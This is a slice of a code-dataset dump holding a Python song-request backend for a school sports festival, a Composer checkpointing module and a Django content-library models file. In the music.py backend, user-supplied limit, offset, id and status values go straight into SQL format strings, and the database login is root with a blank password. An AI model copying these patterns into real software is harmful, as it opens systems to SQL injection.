"Adafruit_BMP.BMP085", "line_number": 68, "usage_type": "name"}, {"api_name": "Adafruit_BMP.BMP085.BMP085_ULTRAHIGHRES", "line_number": 68, "usage_type": "attribute"}, {"api_name": "queue.get", "line_number": 83, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qsl", "line_number": 88, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 88, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "http.client.client.HTTPConnection", "line_number": 90, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 90, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 90, "usage_type": "name"}, {"api_name": "urllib.parse.parse_qsl", "line_number": 101, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 101, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 102, "usage_type": "call"}, {"api_name": "http.client.client.HTTPConnection", "line_number": 103, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 103, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 103, "usage_type": "name"}, {"api_name": "http.client.client", "line_number": 113, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 113, "usage_type": "name"}, {"api_name": "socket.error", "line_number": 113, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 117, "usage_type": "call"}, {"api_name": "time.time", "line_number": 129, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 134, "usage_type": "attribute"}, {"api_name": "urllib.parse.urlencode", "line_number": 140, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 140, "usage_type": "attribute"}, {"api_name": "queue.put_nowait", "line_number": 141, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 143, "usage_type": "call"}, {"api_name": "socket.setdefaulttimeout", "line_number": 168, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 170, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 176, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 180, "usage_type": "call"}, {"api_name": "re.search", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "473273561", "text": "#coding=utf-8\n# 体育节2020点歌系统Python后端\n\nimport json\nimport time\nimport requests\nimport random\nimport pymysql as mdb\n\ncold_time=15*60\npool_time=2*60*60\n\n#数据库操作,传入操作字符串,返回套着字典的列表\ndef query_sql(sql):\n con=mdb.connect('localhost','root','','ours',charset='utf8')\n cur=con.cursor()\n cur.execute(sql)\n con.commit()\n con.close()\n des=cur.description\n l=[]\n for row in cur.fetchall():\n dis={}\n for i in range(len(cur.description)):\n dis[cur.description[i][0]]=row[i]\n l.append(dis)\n return l\n\n#发送qq信息\ndef send_qq(qq,msg):\n data={'user_id':qq,'message':msg+\"\\n\\n〔学联宣传网络部〕\"}\n requests.post(\"http://127.0.0.1:5700/send_msg/\",data=data)\n with open(\"send_qq.log\",\"a\") as f: f.write(json.dumps(data,ensure_ascii=False)+\"\\n\\n\")\n\n#检查点歌冷却时间\ndef check_cold_time(qq):\n r=query_sql(\"select max(submit_time) as time from music where qq='{}'\".format(qq))\n if r[0]['time'] and r[0]['time']>time.time()-cold_time: return False\n return True\n\n#提交点歌\ndef submit(dic):\n data=dic['data']\n if check_cold_time(dic['qq']):\n sql=\"INSERT INTO music(mid,qq,data,status,submit_time)VALUES( \\\n '{}','{}','{}',1,{})\".format(data['mid'],dic['qq'], \\\n mdb.escape_string(json.dumps(data,ensure_ascii=False)),int(time.time()))\n r=query_sql(sql)\n send_qq(dic['qq'],\"小苏收到(・∀・)\\n歌曲审核成功后将会通知您,欢迎访问 suours.com 探索更多~\")\n else: send_qq(dic['qq'],\"( ´_ゝ`)\\n15分钟内只能点一首歌呢....\")\n\n#查询点歌\ndef query(dic):\n try:\n if dic['type']=='split':\n sql=\"select * from music order by id desc limit {} offset {}\".format(dic['limit'],dic['offset'])\n r=query_sql(sql)\n return {'status':'ok','data':r,'len':len(r)}\n \n if dic['type']=='merge_time':\n sql=\"select * from music where status=4 order by play_time desc limit {} offset {}\".format(dic['limit'],dic['offset'])\n r=query_sql(sql)\n return {'status':'ok','data':r,'len':len(r)}\n \n if dic['type']=='merge_num':\n sql=\"select mid,count(*) as ct,max(data) as data from music group by mid order by ct desc,max(id) desc limit {} offset {}\".format(dic['limit'],dic['offset'])\n r=query_sql(sql)\n return {'status':'ok','data':r,'len':len(r)}\n\n if dic['type']=='statis':\n sql=\"select count(status=1 or null) as waiting,count(judge_time>={} and status=2 or null) as pool,count(*) as total from music;\".format(int(time.time()-pool_time))\n r=query_sql(sql)\n return {'status':'ok','data':r[0]}\n \n return {'status':'error'}\n except:\n return {'status':'error'}\n\n\n#审核点歌\ndef judge(dic):\n try:\n sql=\"update music set status={},judge_time={} where id={}\".format(dic['status'],int(time.time()),dic['id'])\n r=query_sql(sql)\n \n if dic['status']==2: send_qq(dic['qq'],\"您的歌曲[{}]审核通过啦~\\n_(:з」∠)_将在接下来两个小时内随机播放。访问 suours.com/music 查看点歌榜单及播放列表,祝您体育节玩得开心!\".format(dic['name']))\n if dic['status']==3: send_qq(dic['qq'],\"emm您的歌曲[{}]审核未通过呢....\\n(´;ω;`)换一首试试嘛~访问 suours.com/music 查看点歌榜单及播放列表,祝您体育节玩得开心!\".format(dic['name']))\n\n return {'status':'ok','data':r,'len':len(r)}\n except:\n return {'status':'error'}\n\n#获取播放音乐\ndef play(dic):\n #try:\n if True:\n sql=\"select * from music where status=5 order by judge_time desc\"\n r=query_sql(sql)\n if len(r): m=r[0]\n else:\n sql=\"select * from music where status=2 and judge_time>={}\".format(int(time.time()-pool_time))\n r=query_sql(sql)\n if len(r)==0: return {'status':'empty'}\n m=r[random.randint(0,len(r)-1)]\n\n sql=\"update music set status=4,play_time={} where id={}\".format(int(time.time()),m['id'])\n query_sql(sql)\n return {'status':'ok','data':m}\n #except:\n # return {'status':'error'}\n \n\n\ndef main(cmd,data):\n if cmd=='submit': submit(data)\n if cmd=='judge': return judge(data)\n if cmd=='query': return query(data)\n if cmd=='play': return play(data)\n\n return {\"status\":\"ok\"}\n\n#submit({'qq':'1525876733','data':{'mid':'S0','name':'2333'}})\n", "sub_path": "api/music.py", "file_name": "music.py", "file_ext": "py", "file_size_in_byte": 4551, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymysql.connect", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 33, "usage_type": "call"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "pymysql.escape_string", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 71, "usage_type": "call"}, {"api_name": "time.time", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 104, "usage_type": "call"}, {"api_name": "time.time", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "592571128", "text": "# Copyright 2021 MosaicML. All Rights Reserved.\n\nimport logging\nimport os\nimport random\nimport warnings\nfrom typing import Any, Dict, Optional\n\nimport numpy as np\nimport torch\nimport yaml\n\nfrom composer.core import Event, State\nfrom composer.core.types import StateDict\nfrom composer.trainer.ddp import DDP\nfrom composer.trainer.devices.device import Device\nfrom composer.utils import seed_all\n\nlog = logging.getLogger(__name__)\n\n\nclass CheckpointLoader:\n \"\"\"Manager for initializing state and restoring RNG state from existing checkpoints.\n\n Args:\n checkpoint_filepath (str): The path to an existing checkpoint file.\n \"\"\"\n\n def __init__(self, checkpoint_filepath: str):\n self.state_dict = torch.load(checkpoint_filepath, map_location='cpu')\n\n def load_checkpoint(self, state: State):\n \"\"\"Initialize state from the loaded checkpoint's data.\n \"\"\"\n\n state.load_state_dict(self.state_dict[\"state\"])\n self.checkpoint_rng_state = self._get_checkpoint_rng_state(state, self.state_dict[\"rng\"])\n\n if state.seed is not None:\n seed_all(state.seed)\n\n def restore_checkpoint_rng_state(self, state: State, device: Device):\n \"\"\"Restore the state of all RNG objects in this context from the loaded checkpoint's data.\n \"\"\"\n\n if self.checkpoint_rng_state is None:\n return\n\n assert state.world_size == len(\n self.checkpoint_rng_state['torch']\n ), f\"invariant violation: if the rng state is being restored, then\" \\\n \"the world size should be the same as in the checkpoint.\"\n\n torch.set_rng_state(self.checkpoint_rng_state['torch'][state.global_rank])\n device.load_state_dict(self.checkpoint_rng_state['device'][state.global_rank])\n random.setstate(self.checkpoint_rng_state['python'][state.global_rank])\n np.random.set_state(self.checkpoint_rng_state['numpy'][state.global_rank])\n\n self.checkpoint_rng_state = None\n\n def _get_checkpoint_rng_state(self, state: State, checkpoint_rng_state: StateDict) -> Optional[StateDict]:\n original_world_size = len(checkpoint_rng_state[\"torch\"])\n if original_world_size == state.world_size:\n return checkpoint_rng_state\n else:\n warnings.warn(f\"The checkpoint was created with world_size({original_world_size}), \"\n f\"which differs from the current world_size({state.world_size}).\"\n f\"RNG state will not be restored.\")\n\n\nclass Checkpointer:\n \"\"\"Manager for saving state to checkpoint files.\n\n Args:\n checkpoint_folder (str): The path to the folder to store checkpoints in.\n checkpoint_interval (int): The amount of time units to wait between checkpoints.\n checkpoint_interval_unit (str): The unit (`\"ep\"` or `\"it\"`) that\n `checkpoint_interval` should be measured in.\n \"\"\"\n\n def __init__(self, checkpoint_folder: str, checkpoint_interval: int, checkpoint_interval_unit: str):\n if checkpoint_interval_unit.lower() == \"ep\":\n self.save_event = Event.EPOCH_END\n elif checkpoint_interval_unit.lower() == \"it\":\n self.save_event = Event.BATCH_END\n else:\n raise ValueError(f\"Unknown checkpointing interval: {checkpoint_interval_unit}\")\n self.checkpoint_folder = checkpoint_folder\n self.save_interval = checkpoint_interval\n\n def should_checkpoint(self, state: State, event: Event) -> bool:\n \"\"\"Given the current state and event, determine whether a checkpoint needs to be created.\n\n Args:\n state (State): The current State of the trainer.\n event (Event): The current Event being executed.\n \"\"\"\n\n if event != self.save_event:\n return False\n if self.save_event == Event.EPOCH_END:\n return state.epoch % self.save_interval == 0\n if self.save_event == Event.BATCH_END:\n return state.step % self.save_interval == 0\n return False\n\n def save_checkpoint(self, state: State, device: Device, ddp: DDP, config: Optional[Dict[str, Any]] = None) -> None:\n \"\"\"Save the current state to a a new checkpoint file.\n\n Args:\n state (State): The current State of the trainer.\n device (Device): The Device in use by this process.\n ddp (DDP): The DDP engine in use by this trainer.\n config (Optional[Dict[str, Any]]): The hparams used to initialize this trainer, if any.\n \"\"\"\n\n state_dict = {\n 'state': state.state_dict(), # should be the same across all ranks. per-rank state not stored\n 'rng': self._get_rng_state(device=device, ddp=ddp), # stored across all ranks\n }\n if not state.is_rank_zero:\n # only rank 0 saves checkpoints\n # Need the check down here so all the DDP syncs will work for generating the checkpoint\n return\n\n # The trainer will only have _hparams_yaml set if it is instantiated with create_from_hparams\n if config:\n hparams_path = os.path.join(self.checkpoint_folder, \"hparams.yaml\")\n os.makedirs(self.checkpoint_folder, mode=0o775, exist_ok=True)\n config_yaml_str = yaml.dump(config)\n try:\n with open(hparams_path, \"x\") as f:\n # Storing the hparams in a separate file so they can be modified before resuming\n f.write(config_yaml_str)\n except FileExistsError as e:\n with open(hparams_path, \"r\") as f:\n # comparing the parsed hparams to ignore whitespace and formatting differences\n if yaml.safe_load(config_yaml_str) != yaml.safe_load(f):\n raise RuntimeError(f\"The hparams in the existing checkpoint folder {self.checkpoint_folder} \"\n \"differ from those being used in the current training run. \"\n \"Please specify a new checkpoint folder.\") from e\n if self.save_event == Event.EPOCH_END:\n filename = f\"ep{state.epoch}.pt\"\n elif self.save_event == Event.BATCH_END:\n filename = f\"it{state.step}.pt\"\n else:\n raise ValueError(f\"Invalid checkpoint event: {self.save_event}\")\n save_file = os.path.join(self.checkpoint_folder, filename)\n with open(save_file, 'xb') as f:\n torch.save(state_dict, f)\n log.info(f'Trainer checkpoint saved to {save_file}')\n\n def _get_rng_state(self, device: Device, ddp: DDP) -> StateDict:\n rng_state = {\n \"python\": ddp.all_gather_object(random.getstate()),\n \"numpy\": ddp.all_gather_object(np.random.get_state()),\n \"torch\": ddp.all_gather_object(torch.random.get_rng_state()),\n \"device\": ddp.all_gather_object(device.state_dict()),\n }\n # casting the state dict as on non-rank-0, entries will be None-like\n return rng_state\n", "sub_path": "composer/trainer/checkpoint.py", "file_name": "checkpoint.py", "file_ext": "py", "file_size_in_byte": 7032, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 30, "usage_type": "call"}, {"api_name": "composer.core.State", "line_number": 32, "usage_type": "name"}, {"api_name": "composer.utils.seed_all", "line_number": 40, "usage_type": "call"}, {"api_name": "composer.core.State", "line_number": 42, "usage_type": "name"}, {"api_name": "composer.trainer.devices.device.Device", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.set_rng_state", "line_number": 54, "usage_type": "call"}, {"api_name": "random.setstate", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.random.set_state", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 57, "usage_type": "attribute"}, {"api_name": "composer.core.State", "line_number": 61, "usage_type": "name"}, {"api_name": "composer.core.types.StateDict", "line_number": 61, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 66, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 61, "usage_type": "name"}, {"api_name": "composer.core.Event.EPOCH_END", "line_number": 83, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 83, "usage_type": "name"}, {"api_name": "composer.core.Event.BATCH_END", "line_number": 85, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 85, "usage_type": "name"}, {"api_name": "composer.core.State", "line_number": 91, "usage_type": "name"}, {"api_name": "composer.core.Event", "line_number": 91, "usage_type": "name"}, {"api_name": "composer.core.Event.EPOCH_END", "line_number": 101, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 101, "usage_type": "name"}, {"api_name": "composer.core.Event.BATCH_END", "line_number": 103, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 103, "usage_type": "name"}, {"api_name": "composer.core.State", "line_number": 107, "usage_type": "name"}, {"api_name": "composer.trainer.devices.device.Device", "line_number": 107, "usage_type": "name"}, {"api_name": "composer.trainer.ddp.DDP", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 129, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 130, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 138, "usage_type": "call"}, {"api_name": "composer.core.Event.EPOCH_END", "line_number": 142, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 142, "usage_type": "name"}, {"api_name": "composer.core.Event.BATCH_END", "line_number": 144, "usage_type": "attribute"}, {"api_name": "composer.core.Event", "line_number": 144, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 150, "usage_type": "call"}, {"api_name": "composer.trainer.devices.device.Device", "line_number": 153, "usage_type": "name"}, {"api_name": "composer.trainer.ddp.DDP", "line_number": 153, "usage_type": "name"}, {"api_name": "random.getstate", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.random.get_state", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.random.get_rng_state", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.random", "line_number": 157, "usage_type": "attribute"}, {"api_name": "composer.core.types.StateDict", "line_number": 153, "usage_type": "name"}]} +{"seq_id": "596668035", "text": "import os\nimport hashlib\nimport magic\nimport Image\nimport json\nfrom django.db import models, transaction\nfrom django.db.models import Max\nfrom django.utils import timezone\nfrom mptt.models import MPTTModel, TreeManager, TreeForeignKey\nfrom django.core.files import File as DjangoFile\nfrom django.contrib.auth.models import User\n\nfrom ..mimemap.models import MimeType\n\nEDIT_SOURCE_CHOICES = (\n ('edit', 'direct edit'),\n ('upload', 'single file upload'),\n ('zip_upload', 'zipped file set upload'),\n ('sync', 'synchronize with external source'),\n)\n\n\nclass DraftManager(models.Manager):\n def create_draft(self, name, user):\n if not name:\n raise ValueError('The draft\\'s name must be set.')\n if user is None:\n raise ValueError('A user must be supplied to create the draft.')\n draft = self.create(name=name, user=user)\n #create citem paths\n draftpath = CItemPath.objects.create(name='Drafts', draft=draft)\n editionpath = CItemPath.objects.create(name='Editions', draft=draft)\n return draft\n\n\nclass Draft(models.Model):\n user = models.ForeignKey(User, related_name=\"baseclib_draft\")\n name = models.CharField(max_length=1024, unique=True)\n create_time = models.DateTimeField(default=timezone.now)\n editions = models.ManyToManyField(\"Edition\", null=True, blank=True)\n active = models.BooleanField(default=True)\n is_private = models.BooleanField(default=False)\n whitelisted_users = models.ManyToManyField(User)\n\n objects = DraftManager()\n\n def __unicode__(self):\n return self.name\n\n def save(self, *args,**kwargs):\n if self.name is None or self.name == \"\":\n self.name = str(self.user) + \"-%s\" % (timezone.now().strftime(\"%Y-%m-%d_%H:%M:%S\"))\n try:\n if self.id is not None:\n my_path = self.get_citem_path()\n if my_path.name != self.name:\n my_path.name = self.name\n py_path.save()\n except CItemPath.DoesNotExist:\n pass\n super(Draft, self).save(*args,**kwargs)\n\n def copy_files(self, source_ci=None, path=None):\n '''Copy a source ContentItem to myself at a specific path'''\n new_path = CItemPath.objects.create(name=path, draft=self, parent=self.get_citem_path())\n new_content = CItem.objects.create(contentfile=source_ci.contentfile,\n name=source_ci.name,\n description=source_ci.description,\n mime_type=source_ci.mime_type,\n detected_meta_data=source_ci.detected_meta_data,\n dimensions=source_ci.dimensions,\n installed_path=new_path,\n rel_pathname_string=source_ci.rel_pathname_string,\n version=source_ci.version,\n edit=source_ci.edit,\n imported=source_ci.imported)\n try:\n self.draftitems_set.get().citems.add(new_content)\n except DraftItems.DoesNotExist:\n self.draftitems_set.add(DraftItems(draft=self))\n self.draftitems_set.get().citems.add(new_content)\n\n def get_item_count(self):\n # there can be only one\n q = self.draftitems_set.all()\n if q.count() == 0:\n return 0\n return q[0].citems.all().count()\n\n def get_citem_path(self):\n try:\n path_drafts = CItemPath.objects.get(name=\"Drafts\", parent__isnull=True)\n except CItemPath.DoesNotExist:\n path_drafts = CItemPath.objects.create(name=\"Drafts\", parent=None, draft=self)\n try:\n my_path = CItemPath.objects.get(parent=path_drafts, draft=self, name=self.name)\n except CItemPath.DoesNotExist:\n my_path = CItemPath.objects.create(name=self.name, parent=path_drafts, draft=self)\n\n return my_path\n\n def get_pending_imports(self):\n ids = list()\n for edit in self.edit_set.all():\n ids.extend(edit.importitem_set.filter(installed_item__isnull=True).values_list('id', flat=True))\n return ImportItem.objects.filter(id__in=ids)\n\n def get_path_wrapped_items(self):\n my_path = self.get_citem_path()\n path_drafts = my_path.parent\n all_paths = CItemPath.objects.filter(draft=self).exclude(parent=path_drafts)\n leaves = []\n for p in all_paths:\n for leaf in p.citems.all():\n # skip the /Drafts/draftname part\n this_path = '/' + '/'.join(p.to_path().split(\"/\")[3:])\n this_path += \"/\" + leaf.name\n leaf_wrapper = dict(item=leaf,\n this_path=this_path)\n leaves.append(leaf_wrapper)\n return leaves\n\n\n @transaction.commit_on_success\n def make_edition(self, name):\n # make editionitems out of all the items\n edition = Edition.objects.create(name=name,\n source_draft=self)\n\n editionitems = EditionItems.objects.create(edition=edition)\n # no longer allowed to edit this draft, must clone to edit\n self.active=False\n self.save()\n try:\n # there is only one\n ditems = self.draftitems_set.get()\n for item in ditems.citems.all():\n editionitems.citems.add(item)\n except DraftItems.DoesNotExist:\n pass\n # make paths for all the items, both direct and\n # the \"aliases\"\n try:\n all_ed_path = CItemPath.objects.get(name=\"Editions\", parent__isnull=True)\n except CItemPath.DoesNotExist:\n all_ed_path = CItemPath.objects.create(name=\"Editions\", parent=None, draft=self)\n\n ed_path = CItemPath.objects.create(name=name, parent=all_ed_path, draft=self)\n my_path = self.get_citem_path()\n for kid in my_path.get_children():\n kid_path = CItemPath.objects.create(name=kid.name, parent=ed_path, draft=self)\n for kitem in kid.citems.all():\n kid_path.citems.add(kitem)\n self.edition_make_helper(kid, kid_path)\n\n return edition\n def edition_make_helper(self, old_parent, new_parent):\n for kid in old_parent.get_children():\n kid_path = CItemPath.objects.create(name=kid.name, parent=new_parent, draft=self)\n for kitem in kid.citems.all():\n kid_path.citems.add(kitem)\n self.edition_make_helper(kid, kid_path)\n\n\n @transaction.commit_on_success\n def clone(self, name, user=None):\n # make editionitems out of all the items\n if user is None:\n user = self.user\n new_draft = Draft.objects.create(name=name, user=user)\n new_draft.whitelisted_users.add(user)\n [new_draft.whitelisted_users.add(user) for user in self.whitelisted_users.all()]\n new_items = DraftItems.objects.create(draft=new_draft)\n\n # there is only one (but there might be none..)\n if self.draftitems_set.exists():\n ditems = self.draftitems_set.all()[0]\n for item in ditems.citems.all():\n new_items.citems.add(item)\n\n # make paths for all the items, both direct and\n # the \"aliases\"\n my_path = self.get_citem_path()\n path_drafts = my_path.parent\n new_path = CItemPath.objects.create(name=name, parent=path_drafts, draft=new_draft)\n for kid in my_path.get_children():\n kid_path = CItemPath.objects.create(name=kid.name, parent=new_path, draft=new_draft)\n for kitem in kid.citems.all():\n kid_path.citems.add(kitem)\n self.clone_helper(kid, kid_path, new_draft)\n return new_draft\n\n def clone_helper(self, old_parent, new_parent, new_draft):\n for kid in old_parent.get_children():\n kid_path = CItemPath.objects.create(name=kid.name, parent=new_parent, draft=new_draft)\n for kitem in kid.citems.all():\n kid_path.citems.add(kitem)\n self.edition_make_helper(kid, kid_path)\n\n class Meta:\n app_label = 'mcms'\n\n\nclass DraftItems(models.Model):\n draft = models.ForeignKey(Draft, unique=True)\n citems = models.ManyToManyField('CItem', null=True, blank=True)\n\n def __unicode__(self):\n return self.draft.name\n\n class Meta:\n app_label = 'mcms'\n\n\nclass Edit(models.Model):\n user = models.ForeignKey(User, related_name=\"baseclib_edit\")\n create_time = models.DateTimeField(default=timezone.now)\n source = models.CharField(max_length=30, choices=EDIT_SOURCE_CHOICES, default=\"edit\")\n draft = models.ForeignKey(Draft)\n active = models.BooleanField(default=True)\n\n def __unicode__(self):\n return \"%s-%d\" % (self.user, self.id)\n\n class Meta:\n app_label = 'mcms'\n\n\nclass CItemManager(models.Manager):\n\n @transaction.commit_on_success\n def install_imported(self, user, imported, update=True):\n \"\"\"\n Creates a :class:`CItem` from an :class:`ImportItem` at the requested\n path in the Content Library's logical filesystem.\n\n This involves the following steps:\n\n 1. Determine the path object where we want the new content item to be\n installed.\n 2. If the path does not exist, create it via\n :func:`CItemPath.objects.create_from_path`.\n 3. Determine if we're replacing an existing content item. If so,\n and update was not passed or passed as ``True``, update it.\n Otherwise, install it.\n\n Args:\n :attr:`user` (:class:`django.contrib.auth.models.User`): User\n installing the content item\n\n :attr:`imported` (:class:`ImportItem`): The uploaded content to\n install or update at its :attr:`requested_path`.\n\n :attr:`update` (``bool``, default: ``True): Whether to update an\n existing item if one is found at the :class:`ImportItem` instance's\n :attr:`requested_path`. If an existing :class:`CItem` is found at\n the requested path but :attr:`update` is passed as ``False``, an\n ``Exception`` will be raised.\n\n Returns:\n The :class:`CItem` created by this method.\n \"\"\"\n draft = imported.edit.draft\n if imported.requested_path is None:\n imported.requested_path = \"/\"\n imported.save()\n path_prefix = os.path.join('/Drafts', draft.name)\n rel_path = imported.requested_path\n rel_full_path = os.path.join(rel_path, imported.name)\n install_path_str = ''.join([path_prefix, rel_path]).rstrip('/')\n install_path = CItemPath.objects.find_by_path(install_path_str, draft)\n if not install_path:\n install_path = CItemPath.objects.create_from_path(\n user, install_path_str, draft)\n imported_name = imported.contentfile.path\n just_path,tail = os.path.split(imported_name)\n\n # We can have multiple items by the same name in the same draft, if\n # they've uploaded multiple versions of it.\n #\n # XXX: I believe the kwarg, \"citempath\" in the line below, should\n # actually be \"installed_path\". Anyone care to confirm?\n # - Forrest\n existing = CItem.objects.filter(name=imported.name, citempath=install_path)\n # If we have existing items, they all share the same installed_path\n # so we can safely take the last one\n if existing:\n existing_item = existing.latest('version')\n\n if not update:\n raise Exception('Must specify update=True to replace item %s' % \\\n existing_item.to_path())\n\n existing_path = install_path\n new_path = None\n path = existing_path\n\n else:\n existing_path = None\n new_path = install_path\n path = new_path\n\n # find all versions of the item identifed by the relative path,\n # which is the libaray logical full id for the item, and change\n # the version number so that we have a version history for the\n # item which is cross draft.\n res = self.filter(rel_pathname_string=rel_full_path).aggregate(Max('version'))\n version = res['version__max']\n if version is None:\n version = 1\n else:\n version += 1\n\n item = self.create(name=imported.name,\n description=imported.description,\n mime_type=imported.mime_type,\n detected_meta_data=imported.detected_meta_data,\n dimensions = imported.dimensions,\n rel_pathname_string=rel_full_path,\n installed_path=path,\n contentfile=DjangoFile(open(imported_name), tail),\n edit=imported.edit,\n imported=imported,\n version=version)\n imported.installed_item=item\n imported.save()\n try:\n draft_items = DraftItems.objects.get(draft=draft)\n except DraftItems.DoesNotExist:\n draft_items = DraftItems.objects.create(draft=draft)\n if existing_path:\n # If the item will live at a existing path location, then\n # we need to remove the old item and replace it with the\n # new in both the existing path and the draft item lists\n existing_path.citems.remove(existing_item)\n draft_items.citems.remove(existing_item)\n existing_path.citems.add(item)\n else:\n # If the path/item combination is new for this draft, then\n # we just add the item to path\n new_path.citems.add(item)\n draft_items.citems.add(item)\n\n return item\n\n def find_by_path(self, path, draft=None):\n last = None\n path_data = path_drafter(path, draft)\n draft = path_data['draft']\n # skip the leading /\n tpath = path_data['full_path'][1:]\n just_path, tail = os.path.split(tpath)\n pitem = CItemPath.objects.find_by_path(just_path, draft)\n if pitem is None:\n return None\n for citem in pitem.citems.all():\n if citem.name == tail:\n return citem\n return None\n\ndef path_drafter(path, draft=None):\n \"\"\"\n Returns:\n ``dict`` with the following keys:\n :attr:`full_path`: A string representing a path, starting with\n \"/Drafts/[Draft Name]/\"\n\n :attr:`rel_path`: A relative version of the full path above, minus\n the leading slash, draft and draft name portions. Example:\n \"foo/bar\".\n\n :attr:`draft`: The ``mcms.baseclib.models.Draft`` instance\n represented by the `full_path` key of this `dict`.\n \"\"\"\n tpath = path\n tmp = tpath.split('/')\n if tpath.startswith('/Draft'):\n tpath = tpath[1:]\n if draft:\n if tmp[2] != draft.name:\n raise Exception('invalid path %s for draft %s' % (path, draft.name))\n else:\n draft_name = tmp[2]\n try:\n draft = Draft.objects.get(name=draft_name)\n except Draft.DoesNotExist:\n raise Exception('invalid path %s for draft %s does not exist' % (path, tpath_2))\n else:\n if draft is None:\n raise Exception('invalid path %s, must be full path with /Drafts or called with draft' % path)\n if tpath.startswith('/'):\n tpath = tpath[1:]\n tpath = \"Drafts/\" + draft.name + \"/\" + tpath\n rel_path = \"/\".join(tpath.split(\"/\")[2:])\n full_path= \"/\" + tpath\n res = dict(full_path=full_path,\n rel_path=rel_path,\n draft=draft)\n return res\n\nclass CItem(models.Model):\n contentfile = models.FileField(upload_to=\"libuploads/%Y/%m/%d\")\n name = models.CharField(max_length=50)\n description = models.CharField(max_length=1024, null=True)\n mime_type = models.CharField(max_length=50)\n detected_meta_data = models.CharField(max_length=1024)\n dimensions = models.CharField(max_length=50, null=True, blank=True)\n installed_path = models.ForeignKey(\"CItemPath\")\n # for easy cross draft search for same logical item, includes item name\n rel_pathname_string = models.CharField(max_length=4096, db_index=True)\n version = models.IntegerField(default=1)\n # this is the edit at which it was created, may be part of multiple drafts\n # see draft item for that\n edit = models.ForeignKey(Edit)\n imported = models.ForeignKey(\"ImportItem\", null=True, blank=True)\n objects = CItemManager()\n\n def can_delete(self):\n pass\n def __unicode__(self):\n msg = str(self.id)\n if self.description:\n msg += \" \" + self.description\n return msg\n\n def get_all_paths(self, draft):\n res = []\n for path in self.citempath_set.filter(draft=draft):\n if path == self.installed_path:\n primary = True\n else:\n primary = False\n full_path_name = path.to_path() + \"/\" + self.name\n if full_path_name.startswith(\"/Editions\"):\n continue\n draft_path_name = path.draft_path() + \"/\" + self.name\n spec = dict(full_path_name=full_path_name,\n draft_path_name=draft_path_name,\n primary=primary,\n path_item=path)\n res.append(spec)\n return res\n\n def full_path(self):\n return self.installed_path.to_path() + \"/\" + self.name\n\n def draft_path_only(self):\n # skip level one \"Drafts\" and two \"draft.name\"\n tmp = (self.installed_path.to_path() + \"/\" + self.name).split(\"/\")\n return \"/\" + '/'.join(tmp[3:-1])\n\n def draft_path(self):\n # skip level one \"Drafts\" and two \"draft.name\"\n tmp = (self.installed_path.to_path() + \"/\" + self.name).split(\"/\")\n return \"/\" + '/'.join(tmp[3:])\n\n def ajax_json_data(self, draft_path=False):\n try:\n dims = json.loads(self.dimensions)\n except TypeError:\n dims = None\n try:\n meta = json.loads(self.detected_meta_data)\n except TypeError:\n meta = None\n except ValueError:\n meta = None\n exten = None\n try:\n mt = MimeType.objects.get(name=self.mime_type)\n if mt.mimeextension_set.all().count > 0:\n exten = 